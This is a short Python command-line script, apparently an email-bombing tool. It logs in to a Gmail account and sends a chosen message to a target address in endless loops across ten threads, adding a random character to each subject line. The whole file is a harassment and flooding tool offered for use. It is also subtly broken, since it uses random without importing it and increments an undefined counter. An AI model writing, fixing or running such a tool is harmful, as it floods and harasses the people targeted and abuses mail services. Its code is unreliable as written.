#!/usr/bin/env python3
import sys, smtplib, ssl, threading, time, string
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
    
def spam(email, passw, target, subject, msg):
    try:
        characters = []
        lower = string.ascii_lowercase
        upper = string.ascii_uppercase
        digit = string.digits
        for i in lower:
            characters.append(i)
        for i in upper:
            characters.append(i)
        for i in digit:
            characters.append(i)
        while True:
            message = MIMEMultipart("alternative")
            message["Subject"] = subject+"        "+characters[random.randint(0,len(characters)-1)]
            message["From"] = email
            message["To"] = target
            emailsent = MIMEText(msg, "plain")
            message.attach(emailsent)
            context = ssl.create_default_context()
            port = 465
            smtp_server = "smtp.gmail.com"
            context = ssl.create_default_context()
            x += 1
            with smtplib.SMTP_SSL(smtp_server, port, context=context) as server:
                server.login(email, passw)
                server.sendmail(email, target, message.as_string())
                server.quit()
                print("\rEmail sent!", end="\r")
                time.sleep(3)
    except smtplib.SMTPAuthenticationError:
        print("Too much logins, or password is incorrrect.")
        quit()

if __name__ == "__main__":
    try:
        target = sys.argv[1]
        email = sys.argv[3]
        passw = sys.argv[4]
    except:
        print("Usage: python {} <TARGET_EMAIL> <MESSAGE_FILE> <YOUR_GMAIL> <PASSWORD>".format(sys.argv[0]))
        quit()
    try:
        file = open(sys.argv[2], "r")
        msg = file.read()
        file.close()
    except:
        print("{} doesmt exists".format(sys.argv[0]))
        quit()
    subject = input("Subject: ")
    print("Spamming started\nInfo:\nFrom: {}\nTo: {}\nSubject:{}\nEmail:\n{}".format(email, target, subject, msg))
    for i in range(10):
        t = threading.Thread(target=spam, args=(email, passw, target,subject, msg))
        t.start()
